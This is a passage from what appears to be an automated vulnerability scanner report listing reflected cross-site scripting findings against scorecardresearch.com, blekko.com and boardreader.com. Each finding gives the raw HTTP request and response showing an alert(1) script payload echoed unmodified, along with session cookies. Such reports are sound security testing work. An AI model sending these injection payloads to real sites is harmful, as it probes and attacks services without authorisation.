This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113950d1<script>alert(1)</script>79857982068&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:54 GMT
Date: Wed, 02 Feb 2011 15:31:54 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:"5070033", c4:"40443113950d1<script>alert(1)</script>79857982068", c5:"59067898", c6:"", c10:"", c15:"", c16:"", r:""});

4.78. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 9641e<script>alert(1)</script>c02414cca98 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113&c5=590678989641e<script>alert(1)</script>c02414cca98&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:54 GMT
Date: Wed, 02 Feb 2011 15:31:54 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
or(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:"5070033", c4:"40443113", c5:"590678989641e<script>alert(1)</script>c02414cca98", c6:"", c10:"", c15:"", c16:"", r:""});

4.79. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 7176f<script>alert(1)</script>cc305f915b3 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035338&c3=5070033&c4=40443113&c5=59067898&c6=7176f<script>alert(1)</script>cc305f915b3& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:55 GMT
Date: Wed, 02 Feb 2011 15:31:55 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035338", c3:"5070033", c4:"40443113", c5:"59067898", c6:"7176f<script>alert(1)</script>cc305f915b3", c10:"", c15:"", c16:"", r:""});

4.80. http://blekko.com/autocomplete [query parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /autocomplete

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload def48<script>alert(1)</script>a050df307b6 was submitted in the query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autocomplete?query=xdef48<script>alert(1)</script>a050df307b6 HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
X-Requested-With: XMLHttpRequest
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fbl=2; v=1; sessionid=352926924

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:41:09 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=15
Cache-Control: max-age=43200
Expires: Thu, 03 Feb 2011 07:41:09 GMT
Vary: Accept-Encoding
Content-Length: 71
X-Blekko-PT: 168498ca1c43565ea8d9e21390a38f4b

{"suggestions":[],"query":"xdef48<script>alert(1)</script>a050df307b6"}

4.81. http://blekko.com/autocomplete [term parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blekko.com
Path:   /autocomplete

Issue detail

The value of the term request parameter is copied into the HTML document as plain text between tags. The payload d17f0<script>alert(1)</script>b1b056eeebb was submitted in the term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /autocomplete?term={searchTerms}d17f0<script>alert(1)</script>b1b056eeebb&lang={language?}&form=opensearch HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:41:04 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Cache-Control: max-age=43200
Expires: Thu, 03 Feb 2011 07:41:04 GMT
Vary: Accept-Encoding
Content-Length: 58
X-Blekko-PT: 9997f158d202984eeb76c315478564b1

["{searchTerms}d17f0<script>alert(1)</script>b1b056eeebb"]

4.82. http://boardreader.com/domain/2mdn.net/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/2mdn.net/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebef7"><script>alert(1)</script>6f696982a6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/2mdn.net/x22?ebef7"><script>alert(1)</script>6f696982a6d=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 19:18:59 GMT
Server: Apache
Pragma:
Cache-Control: no-store, max-age=21600
Expires: Thu, 03 Feb 2011 01:19:01 +0000
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/2mdn.net%2Fx22?ebef7"><script>alert(1)</script>6f696982a6d=1">
...[SNIP]...

4.83. http://boardreader.com/domain/2mdn.net/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/2mdn.net/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b358d'-alert(1)-'f4b7b9879fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/2mdn.net/x22?b358d'-alert(1)-'f4b7b9879fc=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 19:19:53 GMT
Server: Apache
Pragma:
Cache-Control: no-store, max-age=21600
Expires: Thu, 03 Feb 2011 01:19:54 +0000
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>
       
            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=2mdn.net%2Fx22&b358d'-alert(1)-'f4b7b9879fc=1&p=30&d=1288898394&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';
       
if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

4.84. http://boardreader.com/domain/aol.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/aol.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94a63'-alert(1)-'782a59af270 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/aol.com?94a63'-alert(1)-'782a59af270=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:02:03 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:02:10 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>
       
            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=aol.com&94a63'-alert(1)-'782a59af270=1&p=30&d=1288940530&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';
       
if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

4.85. http://boardreader.com/domain/aol.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/aol.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0e75"><script>alert(1)</script>f6043616387 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/aol.com?f0e75"><script>alert(1)</script>f6043616387=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:01:40 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:01:45 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/aol.com?f0e75"><script>alert(1)</script>f6043616387=1">
...[SNIP]...

4.86. http://boardreader.com/domain/cafemom.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/cafemom.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c3d7'-alert(1)-'2f4ee664641 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/cafemom.com?3c3d7'-alert(1)-'2f4ee664641=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:45 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:47 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>
       
            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=cafemom.com&3c3d7'-alert(1)-'2f4ee664641=1&p=30&d=1288939967&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';
       
if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

4.87. http://boardreader.com/domain/cafemom.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/cafemom.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f3ee"><script>alert(1)</script>40468857845 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/cafemom.com?4f3ee"><script>alert(1)</script>40468857845=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:05 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:18 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/cafemom.com?4f3ee"><script>alert(1)</script>40468857845=1">
...[SNIP]...

4.88. http://boardreader.com/domain/myegy.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/myegy.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1683'-alert(1)-'aae0d7e564f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/myegy.com?c1683'-alert(1)-'aae0d7e564f=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:58:55 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:59:00 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>
       
            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=myegy.com&c1683'-alert(1)-'aae0d7e564f=1&p=30&d=1288940340&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';
       
if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

4.89. http://boardreader.com/domain/myegy.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/myegy.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7f3c"><script>alert(1)</script>bb270b2c8f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/myegy.com?a7f3c"><script>alert(1)</script>bb270b2c8f8=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:58:29 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:58:37 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/myegy.com?a7f3c"><script>alert(1)</script>bb270b2c8f8=1">
...[SNIP]...

4.90. http://boardreader.com/domain/nolanfans.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/nolanfans.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e7be"><script>alert(1)</script>8eb8f9da978 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/nolanfans.com?2e7be"><script>alert(1)</script>8eb8f9da978=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:53 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:09 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/nolanfans.com?2e7be"><script>alert(1)</script>8eb8f9da978=1">
...[SNIP]...

4.91. http://boardreader.com/domain/nolanfans.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/nolanfans.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9419e'-alert(1)-'6dbeba69c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /domain/nolanfans.com?9419e'-alert(1)-'6dbeba69c1=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
